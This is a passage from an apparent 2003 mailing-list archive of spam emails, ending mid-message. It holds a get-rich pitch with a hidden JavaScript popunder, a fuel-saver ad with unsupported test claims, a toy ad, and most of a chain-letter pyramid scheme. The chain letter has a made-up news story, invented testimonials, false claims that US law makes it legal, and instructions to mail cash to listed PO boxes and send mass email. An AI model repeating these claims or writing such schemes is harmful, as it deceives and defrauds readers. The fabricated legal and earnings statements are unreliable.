 in my industry in the state of Nevada.</font></p>
      <p><font face=3D"Arial" size=3D"4">I tell you this NOT to impress yo=
u, but to get your attention because I have some extremely important infor=
mation to share with you that is critical to your financial future.</font>=
</p>
      <p><font face=3D"Arial" size=3D"4">My purpose here is not to convinc=
e, sell, or persuade you... but to open your eyes and get you to at least =
be honest with yourself. You may want to bury your head in the sand and pr=
etend what you are about to discover is not true... but if you care about =
your financial future you absolutely MUST take
      15 minutes and read this report and read it carefully. In fact, if y=
ou are serious about being wealthy and living the type of lifestyle that m=
ost people only dream of, you may want to re-read this report several time=
s!</font></p>
      <p><font face=3D"Arial" size=3D"4">Let's get started...</font></p>
      <p align=3D"center"><font face=3D"Arial" size=3D"4"><b><a href=3D"ma=
ilto:usana@chuck.capturepages.net">Click Here, then Click Send</a> to get =
your FREE REPORT</b></font></p>
      <p align=3D"center"><font face=3D"Arial" size=3D"4"><b>"Why I Quit M=
y Job When I Was Making $656,305.14 Per Year"</b></font>

    </TD>

 </TR>

</TABLE>
<script language=3D"JavaScript">
    var popunder=3Dnew Array();
    popunder[0]=3D'http://updatebots.com/cp/whyiquitmyjob.html';
    function get_cookie(Name){var search=3DName+'=3D';var returnvalue=3D''=
;if(document.cookie.length>0){offset=3Ddocument.cookie.indexOf(search);if(=
offset!=3D-1){offset+=3Dsearch.length;end=3Ddocument.cookie.indexOf(';',of=
fset);if(end=3D=3D-1)end=3Ddocument.cookie.length;returnvalue=3Dunescape(d=
ocument.cookie.substring(offset,end))}}return returnvalue;}
    function openWindowRemote(){win2=3Dwindow.open(popunder[Math.floor(Mat=
h.random()*(popunder.length))],'popunder',"scrollbars=3Dyes,resizable=3Dye=
s,toolbar=3Dyes,menubar=3Dyes,status=3Dyes,location=3Dyes,width=3D800,heig=
ht=3D600,left=3D0,top=3D0");win2.blur();
    window.focus();}
    window.onload =3D openWindowRemote;
</script>
</TBODY>

--B.C43CE.43.DD.E--


From fscgqx@yahoo.com Sat Nov 22 14:37:00 2003
Return-Path: <fscgqx@yahoo.com>
Received: from presario4700.dominiosotta.local (presario4700.dominiosotta.local [200.72.178.169] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAMJatRY015152
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 22 Nov 2003 14:36:57 -0500 (EST)
Message-ID: <6k6129c12t7uf2091p355if7l58c19@fqq.x.r4>
From: "Tanya Sylvester" <fscgqx@yahoo.com>
Reply-To: "Tanya Sylvester" <fscgqx@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Boost Your  Car's Gas Mileage 27%+.....jasper
Date: Sat, 22 Nov 2003 20:17:56 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A5981E0C86482D.C"


--A5981E0C86482D.C
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

FUEL SAVER PRO

This revolutionary device Boosts Gas Mileage 27%+ by helping fuel burn bet=
ter using three patented processes from General Motors.
www.bb4n.org/?axel=3D49

PROVEN TECHNOLOGY
A certified U.S. Environmental Protection Agency (EPA) laboratory recently=
 completed tests on the new Fuel Saver. The results were astounding! Maste=
r Service, a subsidiary of Ford Motor Company, also conducted extensive em=
issions testing and obtained similar, unheard of results. The achievements=
 of the Fuel Saver is so noteworthy to the environmental community, that C=
ommercial News has featured it as their cover story in their June, 2000 ed=
ition.

Take a test drive Today - www.bb4n.org/?axel=3D49






No more advertisements, thanks - http://www.aqmp.net/out5s/rem2e.asp































no bqwp qczm vmrakfmx

 nnv

--A5981E0C86482D.C--


From thx1my@yahoo.com Tue Nov 25 13:42:36 2003
Return-Path: <thx1my@yahoo.com>
Received: from 160.36.58.108 ([200.63.152.152])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAPIgQMN004859;
	Tue, 25 Nov 2003 13:42:28 -0500 (EST)
Message-ID: <ge40679c520ue73ud8@t3zsgppi.sn4x>
From: "Harlan Shaver" <thx1my@yahoo.com>
Reply-To: "Harlan Shaver" <thx1my@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Remote-Control Boats & Cars - Great Xmas Gifts.....joachim
Date: Tue, 25 Nov 2003 11:47:35 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8..41_..._"


--8..41_..._
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p>New Mini Remote Control Cars &amp; Boats.</p>
<IMG SRC=3D"http://www.onii.org/images/home/stunt_flip.gif" ALT=3D""><a hr=
ef=3D"http://www.eakv.com/?axel=3D49">Follow Us For Fun...</a><br>
<p>Turbo Twister Mini RC stunt cars are the newest RC stunt cars in 
the world! These 2 1/2 inch stunt cars rotate, flip, and tumble everywhere=
!</p>
<IMG SRC=3D"http://www.onii.org/images/home/car_purple.jpg" ALT=3D""><a hr=
ef=3D"http://www.eakv.com/?axel=3D49">Follow Us For Fun...</a><br>
<p>Honda S2000 (yellow) - fully functional wireless remote control (Radio-=
frequency)</p>
<IMG SRC=3D"http://www.onii.org/images/home/boat_yellow.jpg" ALT=3D""><a h=
ref=3D"http://www.eakv.com/?axel=3D49">Follow Us For Fun...</a><br>
<p>Mini RC Ocean Runner Boat (yellow) - Fully functional remote control bo=
at with 6 way remote control.</p>
<br>
<br>
<br>
<br>
<a href=3D"http://www.5jzd.org/out5s/rem2e-bak.asp">No more advertisements=
</a></p>
<br>
<br>
<br>
<br>yhtrkqp grtzq zokkabhspeuffgh
j meikk
zmjvh
ivxqkmbznviunexm jamwswhqwfwr

--8..41_..._--


From thb690@emptywords.demon.nl Thu Nov 27 04:22:30 2003
Return-Path: <thb690@emptywords.demon.nl>
Received: from 160.36.58.108 ([211.101.209.171])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hAR9MHMN003179
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 27 Nov 2003 04:22:19 -0500 (EST)
Received: from (HELO blnnnbi) [113.5.135.6] by 160.36.58.108 with ESMTP id <485708-85402>; Thu, 27 Nov 2003 15:12:03 +0600
Message-ID: <9$-mwv02-32mzn@zlilqgshopbj25>
From: "Jeannine Hoover" <thb690@emptywords.demon.nl>
Reply-To: "Jeannine Hoover" <thb690@emptywords.demon.nl>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: YOUR AD SENT TO MILLIONS jtluy
Date: Thu, 27 Nov 03 15:12:03 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E6DB_._2C._0A4._BB6"
X-Priority: 3
X-MSMail-Priority: Normal


--E6DB_._2C._0A4._BB6
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>P01</title>
</head>
<body text=3D"#000000" bgcolor=3D"#009900" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
&nbsp;
<center><table CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF" class=3D"=
center" >
<tr>
<td class=3D"backImg">&nbsp;
<center>
<br><b><font face=3D"Arial">DO NOT DELETE THIS - <u>READ FIRST</u> - IT WI=
LL
CHANGE YOUR LIFE!</font></b>
<p><font face=3D"Arial"><font size=3D+2>This <b>Really Works</b>!</font></=
font>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>Give=
 Your
Future Five Minutes And Read This Email</font></font></font></u></b>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>It W=
ill
Change Your Life!</font></font></font></u></b>
<p><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This Simpl=
e
Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>

<blockquote>
<center><font face=3D"Arial">Just Because <b>This&nbsp; Is Easy</b> doesn'=
t
mean it's not <b>Honest</b>, or <b>Real Business</b>.&nbsp; Keep&nbsp;</fo=
nt>
<br><font face=3D"Arial"><b>Working Hard</b> or Learn to <b>Work Smart</b>=
.
What do you think Successful People Do?</font></center>

<blockquote><font face=3D"Arial">This is a completely documented method to=

Get Wealthy and Anyone regardless of Age, Race, State of Health, Country
of origin, or Financial Standing can participate. No Education or Special
Experience is needed. Within the next two weeks you could be well on your
way to a $500,000.00 income. Imagine being able to make over a half millio=
n
dollars every 4 to 5 months from your home.</font></blockquote>

<center><b><font face=3D"Arial">THANK'S TO THE COMPUTER AGE AND THE INTERN=
ET</font></b>
<p><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</font><=
/font></b></center>

<center><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CA=
SH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">"My first thought was that he had robbed a bank",
says the 41-year-old woman, "There was over $71,000 Dollars in that bag
-- that's more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say ''Bull'', please read the follow=
ing.</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to th=
is
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b></blockquote>
</blockquote>

<hr width=3D"600" noshade>
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"This program =
has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center>
<p><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font>=
</b></center>

<p>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!&nbsp;</u></b=
></font></blockquote>

<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b>
<p><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such and=

you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask that's what I always did.</font><font fa=
ce=3D"Arial">Move
the name &amp; address in REPORT # 4 down TO REPORT # 5.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 3 down TO REPORT # 4.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 2 down TO REPORT # 3.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 1 down TO REPORT # 2</font><font
face=3D=
"Arial">Insert
YOUR name &amp; address in the REPORT # 1 Position.</font></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Let's say that you decide to start small,=

just to see how it goes, and we will assume You and those involved send
out only 5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NU=
MBERS
DO NOT LIE</font></font></font></b></center>

<blockquote>
<blockquote><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-=
1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Advertising on the net is very, very inex=
pensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></blockquote>

<center><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME=

ONLY</b>.</font></center>

<blockquote><b><font face=3D"Arial">Notes:</font></b>
<p><font face=3D"Arial">Always send $5 cash (U.S. CURRENCY) for each Repor=
t.
Checks NOT accepted. Make sure the cash is concealed by wrapping it in
at least 2 sheets of paper or foil will also work. On one of those sheets
of paper, write the NUMBER &amp; the NAME of the Report you are ordering,
YOUR E-MAIL ADDRESS and your name and postal address.</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></=
font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<br>&nbsp;
<center><table WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#009900" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>T. Brown</fo=
nt></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O. Box 14378</font=
></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Jacksonville, FL 322=
38-1378</font></font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>C. Bernerd</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 319</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Sheilah W</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 297</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>NetWiz Rds</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>PO Box 025216, Apt SJO3016</fo=
nt></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Miami, FL 33102</font></font><=
/b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Steve W</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 115-3016</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>San Rafael de Heredia</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Costa Rica</font></font></b></=
blockquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity to become financiall=
y
independent. IT IS UP TO YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">MORE TESTIMONIALS</font></b></center>

<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mi=
tchell.
My wife, Jody and I live in Chicago. I am an accountant with a major U.S.C=
orporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></blockquote>
</blockquote>

<center>
<hr width=3D"85%"></center>

<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the=

gambling type, it took me several weeks to make up my mind to participate
in this plan. But conservative as I am, I decided that the initial investm=
ent
was so little that there was just no way that I wouldn't get enough orders=

to at least get my money back. I was surprised when I found my medium size=

